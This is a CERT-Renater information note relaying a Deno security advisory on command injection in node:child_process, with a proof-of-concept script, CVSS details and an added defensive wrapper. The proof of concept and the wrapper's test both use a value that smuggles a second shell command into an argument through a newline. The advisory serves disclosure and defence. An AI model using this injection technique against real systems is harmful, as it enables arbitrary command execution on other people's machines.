=====================================================================
                            CERT-Renater

                 Information Note No. 2026/VULN199
_____________________________________________________________________

DATE                : 20/02/2026

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running deno versions prior to 2.6.8.

=====================================================================
https://github.com/denoland/deno/security/advisories/GHSA-hmh4-3xvx-q5hr
_____________________________________________________________________

Command Injection via Incomplete shell metacharacter blocklist in
`node:child_process`

High
bartlomieju published GHSA-hmh4-3xvx-q5hr Feb 19, 2026

Package
deno

Affected versions
2.6.7

Patched versions
2.6.8

Description

Summary

A command injection vulnerability exists in Deno's node:child_process
implementation.

Reproduction

    import { spawnSync } from "node:child_process";
    import * as fs from "node:fs";

    // Cleanup
    try { fs.unlinkSync('/tmp/rce_proof'); } catch {}

    // Create legitimate script
    fs.writeFileSync('/tmp/legitimate.ts', 'console.log("normal");');

    // Malicious input with newline injection
    const maliciousInput = `/tmp/legitimate.ts\ntouch /tmp/rce_proof`;

    // Vulnerable pattern
    spawnSync(Deno.execPath(), ['run', '--allow-all', maliciousInput], {
      shell: true,
      encoding: 'utf-8'
    });

    // Verify
    console.log('Exploit worked:', fs.existsSync('/tmp/rce_proof'));

Run:

    deno run --allow-all poc.mjs

The file /tmp/rce_proof is created, confirming arbitrary command
execution.

Mitigation

All users need to update to the patched version (Deno v2.6.8).
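Alongside the upgrade, callers that build child-process arguments from untrusted input can avoid the pattern the reproduction above labels vulnerable. The following is an added example, not part of the advisory or of Deno's code: it passes arguments as an argv array with `shell` forced off and rejects any argument containing a control character such as the injected newline; `findUnsafeArg`, `runWithoutShell` and `checkUntrusted` are hypothetical names.

```javascript
// Added example, not from the advisory. Helper names are hypothetical.
// CommonJS form for Node; in an ES module, import spawnSync as the
// reproduction does.
const { spawnSync } = require("node:child_process");

// ASCII control characters, including the \n used in the reproduction.
// A script path or CLI argument has no legitimate reason to contain one.
const CONTROL_CHARS = /[\u0000-\u001f\u007f]/;

// Index of the first argument that must be rejected, or -1 if all pass.
function findUnsafeArg(args) {
  return args.findIndex((a) => typeof a !== "string" || CONTROL_CHARS.test(a));
}

// Spawn `file` with `args` as an argv array. `shell` is forced to false after
// spreading the caller's options, so a caller cannot re-enable it.
function runWithoutShell(file, args, options = {}) {
  const bad = findUnsafeArg(args);
  if (bad !== -1) {
    throw new TypeError(`argument ${bad} contains a control character`);
  }
  return spawnSync(file, args, { encoding: "utf-8", ...options, shell: false });
}

// Constructed input with the same shape as the advisory's malicious value.
const untrusted = "/tmp/legitimate.ts\ntouch /tmp/rce_proof";

// Returns "rejected" when the wrapper refuses the input before spawning.
function checkUntrusted(value) {
  try {
    runWithoutShell(process.execPath, ["--version", value]);
    return "spawned";
  } catch (err) {
    if (err instanceof TypeError) return "rejected";
    throw err;
  }
}

console.log(checkUntrusted(untrusted)); // "rejected"
```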

Severity
High 8.1 / 10

CVSS v3 base metrics
Attack vector       : Network
Attack complexity   : High
Privileges required : None
User interaction    : None
Scope               : Unchanged
Confidentiality     : High
Integrity           : High
Availability        : High

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID
CVE-2026-27190

Weaknesses
CWE-78

Credits
@jackhax (Reporter)

=========================================================
+ CERT-RENATER        | tel : 01-53-94-20-44            +
+ 23/25 Rue Daviel    | fax : 01-53-94-20-41            +
+ 75013 Paris         | email:cert@support.renater.fr   +
=========================================================